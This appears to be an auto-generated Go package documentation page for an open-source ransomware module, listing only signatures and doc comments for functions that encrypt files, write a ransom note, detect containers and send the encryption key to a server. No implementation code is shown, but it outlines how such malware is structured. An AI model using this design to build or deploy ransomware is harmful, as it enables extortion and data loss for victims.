ransomware

package

v0.0.0-...-95adb3f Latest Latest Go to latest Published: Apr 30, 2022 License: GPL-3.0 Imports: 19 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/nireo/gocry

Links

Open Source Insights

Documentation ¶

Index ¶

type Ransomware
- func NewRansomware() (*Ransomware, error)

Constants ¶

This section is empty.

Variables ¶

This section is empty.

Functions ¶

This section is empty.

Types ¶

type Ransomware ¶

type Ransomware struct {
	MemguardKey *memguard.Enclave
	PublicKey   string
	RootDir     string
	IP          string
	Data        *victim.VictimIndentifier
}

Ransomware holds all the needed client information needed to go forward with the ransom.

func NewRansomware ¶

func NewRansomware() (*Ransomware, error)

NewRansomware creates a new ransomware instance given a starting directory. This function automatically generates a 32-bit encryption key to encrypt files.

func (*Ransomware) CheckIfActiveRansom ¶

func (rw *Ransomware) CheckIfActiveRansom() error

CheckIfActiveRansom checks for any files with the .gocry extension such that then the ransomware knows not to re-ecrypt the files.

func (*Ransomware) CheckIfInContainer ¶

func (rw *Ransomware) CheckIfInContainer() error

Check if the ransomware is started in a container which allows all of the urls and ports.

func (*Ransomware) CheckIfValidMemSafeKey ¶

func (rw *Ransomware) CheckIfValidMemSafeKey() bool

CheckIfValidMemSafeKey checks if the key inside the memguard enclave is the same as the key written inside of key.txt

func (*Ransomware) CreateRansomInfoFile ¶

func (rw *Ransomware) CreateRansomInfoFile(message string) error

CreateTextFiles is responsible for creating the ransom.txt. The message is taken as a parameter since it makes the main file look more clear and configurable.

func (*Ransomware) GetValidKeyFromServer ¶

func (rw *Ransomware) GetValidKeyFromServer() error

GetValidKeyFromServer sends a post request which contains the encryption key and then the server decrypts the key using the rsa private key and sends it back.

func (*Ransomware) RemoveKeyFile ¶

func (rw *Ransomware) RemoveKeyFile() error

RemoveKeyFile removes the generated key file which holds the decryption key to the encrypted files.

func (*Ransomware) RemoveRansomFile ¶

func (rw *Ransomware) RemoveRansomFile() error

RemoveRansomFile removes the generated ransom file which notifies user that the computer is under ransom.

func (*Ransomware) SendKeyToServer ¶

func (rw *Ransomware) SendKeyToServer() error

SendKeyToServer sends the encryption key with rsa encryption to the server.

func (*Ransomware) WriteKeyWithFile ¶

func (rw *Ransomware) WriteKeyWithFile(publicKey []byte) error

WriteKeyWithFile takes in a public key file so we don't need to fetch it from the server.

func (*Ransomware) WriteMemSafeKey ¶

func (rw *Ransomware) WriteMemSafeKey() error

WriteMemSafeKey writes the encryption key to a file using a public key from the server. The key is passed through crypt.EncryptKey, whichs gets the public key and encrypts it as well.

Source Files ¶

View all Source files

ransomware.go

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL